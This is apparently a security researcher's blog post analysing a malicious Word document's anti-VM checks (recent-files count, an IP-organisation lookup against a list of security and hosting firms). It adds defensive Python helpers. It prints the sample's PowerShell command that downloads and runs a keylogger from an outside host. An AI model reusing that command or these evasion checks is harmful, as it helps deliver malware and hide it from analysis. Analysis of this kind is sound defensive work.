Anti VM Tricks | Malware VM Detection Techniques

The Malware Sample

Recently, I was tasked with investigating a malware sample that sometimes failed to behave maliciously. Unlike normal people, I spend a lot of time trying to run malware, and it can be surprisingly difficult to get it to behave as it should. Any number of things can go wrong, leaving the malware to simply crash or do nothing at all. In this post, I’ll discuss some clever anti-VM tricks observed in a malicious Word document.

The sample’s sha256 hash is 048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e. Additional related samples can be found by searching VirusTotal for "vbaproject.bin" "activeX1.bin" type:docx.

Here’s how the document looks when opened in Word:

If that didn’t look suspicious enough, here’s a view of the code:

This is textbook Word malware. It has no real content, includes executable code (active content), and the code is obfuscated and sketchy looking.

The Malware Investigation (VM Detection)

I first looked at the code and noticed this subroutine near the top: InkPicture1_Painted(ByVal DQkDFU As Long, ByVal KPhPosT As IInkRectangle). This looked like the execution entry point: it was probably executed as soon as the “Enable Content” button was clicked and every time the ActiveX control was rendered (i.e. painted) by Word. All it does is call IuIxpP and swallow any errors that are raised.

Trick #1

The IuIxpP sub calls two methods, DKTxHE and qrNjY, and raises an error if either one returns true. The first, DKTxHE, is deviously simple:

Public Function DKTxHE() As Boolean
DKTxHE = RecentFiles.Count < 3
End Function

The RecentFiles object gives access to the history of recent documents. Most users, unless they just installed Word, are going to have opened more than two documents. However, on a testing virtual machine (VM), the software is normally not “broken in”. When the VM is initially created, software is installed, maybe opened once or twice to make sure it works, and then the state is saved. Every time a test needs to be run, that state is loaded again. These VM images may then be used in automated analysis and testing tools which execute malware and observe how it behaves. If malware can tell when it’s being tested in a VM, it can avoid doing anything suspicious or malicious and thereby increase the time it takes for such tools to detect it.

Trick #2

The second sub, qrNjY, also tries to detect if it’s in a VM by getting information about the IP address. It makes a request to https://www.maxmind.com/geoip/v2.1/city/me which normally requires some kind of authentication or API key. To get around this requirement, the malware makes the request look as if it’s coming from the site itself by setting the HTTP Referer header to https://www.maxmind.com/en/locate-my-ip-address and the User-Agent header to Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0). This bypass only returns information about the requesting address, which has limited uses.
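For analysts who want to spot this check in proxy or sandbox network logs, the request described above can be recognized by its URL plus the two spoofed headers. The following is a minimal Python sketch. The function name matches_sample_request and the assumption that a log entry exposes its headers as a plain dictionary are mine, not part of the sample.

```python
# Sketch only: recognize a logged HTTP request that matches the
# geolocation lookup described above. Nothing is sent over the network.

GEOIP_URL = "https://www.maxmind.com/geoip/v2.1/city/me"

# Header values as reported in the analysis of the sample.
SPOOFED_HEADERS = {
    "Referer": "https://www.maxmind.com/en/locate-my-ip-address",
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
}


def matches_sample_request(url: str, headers: dict) -> bool:
    """Return True if an observed request has the same URL and spoofed headers.

    Header names are compared case-insensitively, since HTTP header
    names are not case-sensitive. Header values must match exactly.
    """
    normalized = {name.lower(): value for name, value in headers.items()}
    return url == GEOIP_URL and all(
        normalized.get(name.lower()) == value
        for name, value in SPOOFED_HEADERS.items()
    )
```

A match on all three values is a stronger signal than the URL alone, because a real visitor to the "locate my IP address" page may well trigger the same lookup from an ordinary browser.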

The response is in JSON and contains information such as the country, city, and, most importantly, the organization associated with the IP address. For example:

{
  "location": {
    "latitude": 30.7858,
    "longitude": -102.1232,
    "metro_code": 705,
    "accuracy_radius": 5,
    "time_zone": "America/Los_Angeles"
  },
  "continent": {
    "names": {
      "ja": "北アメリカ",
      "pt-BR": "América do Norte",
      "de": "Nordamerika",
      "es": "Norteamérica",
      "ru": "Северная Америка",
      "fr": "Amérique du Nord",
      "zh-CN": "北美洲",
      "en": "North America"
    },
    "code": "NA",
    "geoname_id": 6255149
  },
  "city": {
    "names": {
      "pt-BR": "Oakland",
      "de": "Oakland",
      "es": "Oakland",
      "ja": "オークランド",
      "en": "Oakland",
      "ru": "Окленд",
      "fr": "Oakland",
      "zh-CN": "奥克兰"
    },
    "geoname_id": 5378538
  },
  "postal": {
    "code": "94619"
  },
  "country": {
    "names": {
      "ru": "США",
      "fr": "États-Unis",
      "zh-CN": "美国",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "es": "Estados Unidos",
      "pt-BR": "Estados Unidos",
      "de": "USA"
    },
    "iso_code": "US",
    "geoname_id": 6252001
  },
  "traits": {
    "organization": "Comcast Cable",
    "isp": "Comcast Cable",
    "ip_address": "123.123.123.123",
    "autonomous_system_organization": "Comcast Cable Communications, LLC",
    "domain": "comcast.net",
    "autonomous_system_number": 7922
  },
  "registered_country": {
    "geoname_id": 6252001,
    "names": {
      "zh-CN": "美国",
      "ru": "США",
      "fr": "États-Unis",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "pt-BR": "Estados Unidos",
      "de": "USA",
      "es": "Estados Unidos"
    },
    "iso_code": "US"
  },
  "subdivisions": [
    {
      "geoname_id": 5332921,
      "names": {
        "ru": "Калифорния",
        "fr": "Californie",
        "zh-CN": "加利福尼亚州",
        "en": "California",
        "ja": "カリフォルニア州",
        "pt-BR": "Califórnia",
        "es": "California",
        "de": "Kalifornien"
      },
      "iso_code": "CA"
    }
  ]
}

In the example response, the IP address is associated with Comcast. After this request is made, several strings are decrypted and stored in an array. If any of the strings in the array is found in the JSON response, the code raises an error and stops executing. Everything is converted to uppercase before any comparison is made. Here is the list of strings in the array, with capitalization fixed and sorted alphabetically:

Amazon
anonymous
BitDefender
BlackOakComputers
Blue Coat
BlueCoat
Cisco
cloud
Data Center
DataCenter
DataCentre
dedicated
ESET, Spol
FireEye
ForcePoint
Fortinet
Hetzner
hispeed.ch
hosted
Hosting
Iron Port
IronPort
LeaseWeb
MessageLabs
Microsoft
MimeCast
NForce
Ovh Sas
Palo Alto
ProofPoint
Rackspace
security
Server
Strong Technologies
Trend Micro
TrendMicro
TrustWave
VMVault
Zscaler

After this list was obtained, it was clear the purpose of this sub is to check if the IP address is associated with any hosting or anti-virus companies which are likely to be hosting testing VMs.
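The matching step can be sketched in a few lines of Python. This is an illustration of the behavior described above, not a translation of the sample’s VBA: the function name response_trips_check is hypothetical, and it assumes the check is a plain substring search over the entire uppercased response rather than over a single field.

```python
# Sketch only: model of the string check described above.
# The terms are the decrypted strings listed in this post.
BLOCKLIST = [
    "Amazon", "anonymous", "BitDefender", "BlackOakComputers",
    "Blue Coat", "BlueCoat", "Cisco", "cloud",
    "Data Center", "DataCenter", "DataCentre", "dedicated",
    "ESET, Spol", "FireEye", "ForcePoint", "Fortinet",
    "Hetzner", "hispeed.ch", "hosted", "Hosting",
    "Iron Port", "IronPort", "LeaseWeb", "MessageLabs",
    "Microsoft", "MimeCast", "NForce", "Ovh Sas",
    "Palo Alto", "ProofPoint", "Rackspace", "security",
    "Server", "Strong Technologies", "Trend Micro", "TrendMicro",
    "TrustWave", "VMVault", "Zscaler",
]


def response_trips_check(raw_response: str, blocklist=BLOCKLIST) -> bool:
    """Return True if any blocklist term occurs in the raw response text.

    Both sides are uppercased first, so the comparison is
    case-insensitive, as described for the sample.
    """
    haystack = raw_response.upper()
    return any(term.upper() in haystack for term in blocklist)
```

Running a sandbox’s own geolocation response through a function like this gives a quick indication of whether the environment would be rejected. Under the substring assumption, note that short terms can match unrelated fields: a response naming the city "San Francisco" contains "CISCO" and would trip the check regardless of the organization.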

After taking apart and understanding the two anti-sandbox / anti-VM subroutines, I had a pretty good idea why we sometimes failed to detect this particular sample. To test my hypothesis, I created an empty Word document and copied it twice to produce three documents with different names. Then, I opened each one and closed Word in order to populate the recent documents history. Finally, I opened the malware in question, enabled active content, and was immediately greeted with a satisfying “Threat Detected” popup and the near immediate termination of the malicious document. If I opened the malware without first creating a history of recent documents, it would fail to do anything malicious at all. Because it didn’t actually do anything bad, it wasn’t detected.
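The file-copying part of that preparation is easy to script when building VM images. Below is a minimal Python sketch; the function name make_seed_documents and the file naming scheme are assumptions made for illustration. It only creates the copies. Each one still has to be opened in Word, as described above, before it appears in the recent documents history.

```python
import shutil
from pathlib import Path


def make_seed_documents(seed: Path, out_dir: Path, count: int = 3) -> list:
    """Copy one seed document into `count` files with distinct names.

    Returns the paths of the copies. The default of three matches the
    threshold checked by the sample (RecentFiles.Count < 3).
    """
    out_dir.mkdir(parents=True, exist_ok=True)
    copies = []
    for index in range(1, count + 1):
        # e.g. blank.docx -> blank_1.docx, blank_2.docx, blank_3.docx
        target = out_dir / f"{seed.stem}_{index}{seed.suffix}"
        shutil.copyfile(seed, target)
        copies.append(target)
    return copies
```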

The Payload

Still somewhat curious about what the payload could be, I continued taking apart the sample to find that it executes some PowerShell:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

This script downloads http://silkflowersdecordesign.com/admin/worddata.dat to a temporary file and executes it. The downloaded file turned out to be a low-level keylogger. The SHA-256 hash for worddata.dat is 19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744.
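When triaging many samples like this one, it helps to pull download URLs out of recovered command lines automatically. The following Python sketch shows one way to do that with a regular expression. The function name extract_urls and the pattern are illustrative assumptions. The pattern is deliberately simple and will miss URLs that are obfuscated or assembled at runtime.

```python
import re

# Match http(s) URLs up to the first whitespace, quote, or parenthesis.
URL_PATTERN = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def extract_urls(command_line: str) -> list:
    """Return the distinct URLs found in a command line, in order of appearance."""
    found = []
    for url in URL_PATTERN.findall(command_line):
        if url not in found:
            found.append(url)
    return found


# The PowerShell command recovered from the sample in this post.
SAMPLE_COMMAND = (
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
    "$f=[System.IO.Path]::GetTempFileName();"
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://silkflowersdecordesign.com/admin/worddata.dat', $f);"
    "(New-Object -com WScript.Shell).Exec($f)"
)

if __name__ == "__main__":
    for url in extract_urls(SAMPLE_COMMAND):
        print(url)
```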

Related Works (Anti VM / Anti Sandbox Techniques)

Very closely related anti-VM / anti-sandbox techniques have been discussed by researchers at Proofpoint and by Deepen Desai at Zscaler. Since these methods are appearing in different malware families, they seem to represent a new trend for VBA-based malware.

Conclusion

Testing malware is hard and there’s a lot that can go wrong, especially if you don’t rely merely on simple signatures but instead detect malicious behavior. For a fair evaluation of an AV product, a test must exercise the most malicious code and invoke realistic behaviors from the malware samples. This means selecting malware which is still “alive”, i.e. has command and control servers which are still up and functioning, and configuring the test VM to look as much like an actual user’s machine as possible. Both conditions can be met, but it’s easy to stuff a test set with samples that are either not valid executables or don’t behave maliciously. Likewise, many tests are performed on freshly minted VM images with no user activity history, running in the cloud, which can be detected by interrogating IP address information. Selecting good samples and creating good VM images takes extra effort.

Not only does this sort of lazy evaluation skew detection results, but the skew is unrealistic. Signatures can easily detect executables that don’t run and can’t behave maliciously, but is that really what’s threatening your users? Real threats are the ones that no one has seen yet, or that are so new that signatures haven’t been created for them. A fair test must include current, functional samples executed in a realistic environment.
